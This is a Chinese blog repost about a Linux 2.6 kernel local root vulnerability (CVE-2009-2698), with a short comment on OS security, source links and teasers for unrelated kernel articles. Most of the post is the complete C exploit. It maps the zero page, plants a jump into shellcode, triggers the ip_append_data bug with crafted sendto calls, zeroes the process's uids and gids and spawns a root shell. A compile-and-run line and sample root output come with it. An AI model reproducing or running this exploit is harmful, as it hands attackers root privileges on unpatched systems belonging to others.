Linux kernel 2.6 < 2.6.19 (32bit) ip_append_data() local ring0 root exploit

转载 2012年04月20日 11:26:44

linux 又爆一本地提权的漏洞,据之前的本地提权的漏洞时间很短啊···昨天还和朋友说起过,到底是 windows 安全还是 linux 安全?你说windows 不安全,Microsoft 用到现在也没啥大的问题,你说 Linux 安全,但又经常被一下子就到 root 了··所以说没有不安全的系统,只有不安全的人,最重要的还是用这操作系统的人,人才是安全的根本....

附一个来自包子 Blog 的利用截图




另附 EXP :

/*
**
** 0x82-CVE-2009-2698
** Linux kernel 2.6 < 2.6.19 (32bit) ip_append_data() local ring0 root exploit
**
** Tested White Box 4(2.6.9-5.ELsmp),
** CentOS 4.4(2.6.9-42.ELsmp), CentOS 4.5(2.6.9-55.ELsmp),
** Fedora Core 4(2.6.11-1.1369_FC4smp), Fedora Core 5(2.6.15-1.2054_FC5),
** Fedora Core 6(2.6.18-1.2798.fc6).
**
** --
** Discovered by Tavis Ormandy and Julien Tinnes of the Google Security Team.
** Thankful to them.
**
** --
** bash$ gcc -o 0x82-CVE-2009-2698 0x82-CVE-2009-2698.c && ./0x82-CVE-2009-2698
** sh-3.1# id
** uid=0(root) gid=0(root) groups=500(x82) context=user_u:system_r:unconfined_t
** sh-3.1#
** --
** exploit by <p0c73n1(at)gmail(dot)com>.
**
*/

#include <stdio.h>
#include <unistd.h>
#include <string.h>
#include <sys/socket.h>
#include <sys/mman.h>
#include <fcntl.h>
#include <sys/personality.h>

unsigned int uid, gid;
void get_root_uid(unsigned *task)
{
  unsigned *addr=task;
  while(addr[0]!=uid||addr[1]!=uid||addr[2]!=uid||addr[3]!=uid){
    addr++;
  }
  addr[0]=addr[1]=addr[2]=addr[3]=0; /* set uids */
  addr[4]=addr[5]=addr[6]=addr[7]=0; /* set gids */
  return;
}
void exploit();
void kernel_code()
{
  asm("exploit:\n"
    "push %eax\n"
    "movl $0xfffff000,%eax\n"
    "andl %esp,%eax\n"
    "pushl (%eax)\n"
    "call get_root_uid\n"
    "addl $4,%esp\n"
    "popl %eax\n");
  return;
}
void *kernel=kernel_code;

int main(int argc, char **argv)
{
  int fd=0;
  char buf[1024];
  struct sockaddr x0x;
  void *zero_page;

  uid=getuid();
  gid=getgid();
  if(uid==0){
    fprintf(stderr,"[-] check ur uid\n");
    return -1;
  }
  if(personality(0xffffffff)==PER_SVR4){
    if(mprotect(0x00000000,0x1000,PROT_READ|PROT_WRITE|PROT_EXEC)==-1){
      perror("[-] mprotect()");
      return -1;
    }
  }
  else if((zero_page=mmap(0x00000000,0x1000,PROT_READ|PROT_WRITE|PROT_EXEC,MAP_FIXED|MAP_ANONYMOUS|MAP_PRIVATE,0,0))==MAP_FAILED){
      perror("[-] mmap()");
      return -1;
  }
  *(unsigned long *)0x0=0x90909090;
  *(char *)0x00000004=0x90; /* +1 */
  *(char *)0x00000005=0xff;
  *(char *)0x00000006=0x25;
  *(unsigned long *)0x00000007=(unsigned long)&kernel;
  *(char *)0x0000000b=0xc3;

  if((fd=socket(PF_INET,SOCK_DGRAM,0))==-1){
    perror("[-] socket()");
    return -1;
  }
  x0x.sa_family=AF_UNSPEC;
  memset(x0x.sa_data,0x82,14);
  memset((char *)buf,0,sizeof(buf));
  sendto(fd,buf,1024,MSG_PROXY|MSG_MORE,&x0x,sizeof(x0x));
  sendto(fd,buf,1024,0,&x0x,sizeof(x0x));
  if(getuid()==uid){
    printf("[-] exploit failed, try again\n");
    return -1;
  }
  close(fd);
  execl("/bin/sh","sh","-i",NULL);
  return 0;
}

/* eoc */

 

 

 

via.http://www.exploit-db.com/exploits/9542/

 

相关http://www.15897.com/blog/post/Linux-Kernel-2.x-sock_sendpage-Local-Root-Exploit.html 

 

http://baoz.net/linux-localroot-no-patch-again/

 

 

http://bbs.chinaunix.net/redirect.php?goto=findpost&ptid=1960669&pid=14038426

linux内核2.6升级到3.11.4

检查当前版本 [Long80A@VM-196~]$ uname -r 2.6.32-279.el6.x86_64 查看当前的/boot/grub/grub.conf内容:   下面使用root用户操作...
  • ssergsw
  • ssergsw
  • 2013年11月19日 18:03
  • 2774

全虚拟化和半虚拟化的区别 cpu的ring0 ring1又是什么概念? - 转

http://www.cnblogs.com/xusongwei/archive/2012/07/30/2615592.html ring0是指CPU的运行级别,ring0是最高级别,ring1次之...
  • liuyanqing119
  • liuyanqing119
  • 2016年12月07日 16:17
  • 173

linux 2.6 内核配置说明

转自:http://blog.chinaunix.net/uid-25304914-id-3029140.html 链接: http://wenku.baidu.com/view/b939...
  • JY_Sharer
  • JY_Sharer
  • 2014年02月09日 23:05
  • 4451

嵌入式Linux启动过程中的问题积累 --补充kernel panic的非EBAI问题

嵌入式Linux启动过程中的问题积累 博文原地址:http://blog.csdn.net/dzassn/article/details/1953993 1.Bad Magic...
  • pengrui18
  • pengrui18
  • 2014年01月15日 22:31
  • 1992

全面解析Linux 内核 3.10.x - 抉择

From: ongoingcre 不在沉默中爆发,就在沉默中灭亡 - 鲁迅大神北京的冬天总是来的快,去的晚。好似冬天就占据了一年的一半,秋装没装上几天,就已经不能抵御那寒风和雾霾!今天好像还飘起了雪...
  • ongoingcre
  • ongoingcre
  • 2015年11月05日 22:06
  • 2965

Linux Kernel 2.6进程调度的分析

第一章 Kernel 2.4存在的不足 根据对2.4进程调度的分析,我们总结出看出2.4内核总的特点就是:         内核调度简单有效         内核不可抢占 但是经过对2.4内核...
  • wrx1721267632
  • wrx1721267632
  • 2015年11月30日 15:30
  • 587

Android/Linux Kernel 内存管理-入门笔记

Android/Linux Kernel上下層的記憶體管理機制,由於牽涉到基礎,核心與使用者空間的Framework,這系列的文章會分為幾個單元,依據筆者自己的時間安排,逐一分享出來,並希望對各位有所...
  • lpplou
  • lpplou
  • 2014年12月04日 13:03
  • 2474

【Linux】【cmdline】uboot传递给内核的root设备序号动态变化导致启动失败

现象 板子上插入SD卡启动Linux系统后,emmc的设备名称是/dev/mmcblck1;板子上没有插入SD卡,Linux启动后,emmc的设备名称是/dev/mmcblck0. uboot传递...
  • w8u
  • w8u
  • 2017年02月16日 14:47
  • 398

现在的 Linux 内核和 Linux 2.6 的内核有多大区别?

origin:  http://www.zhihu.com/question/35484429/answer/62964898?from=timeline&isappinstalled...
  • yazhouren
  • yazhouren
  • 2015年09月14日 15:42
  • 527

特权级--ring3到ring0

还记得吗?我们用调用门和lcall指令实现特权级由低到高的转移. 假设我们想由代码A转移到代码B,运用一个调用门G,即调用门G中的目标选择子指向代码B的段。实际上我们要考虑4个要素:CPL、RPL、...
  • bfboys
  • bfboys
  • 2016年09月03日 10:19
  • 545
内容举报
返回顶部
收藏助手
不良信息举报
您举报文章:Linux kernel 2.6 < 2.6.19 (32bit) ip_append_data() local ring0 root exploit
举报原因:
原因补充:

(最多只允许输入30个字)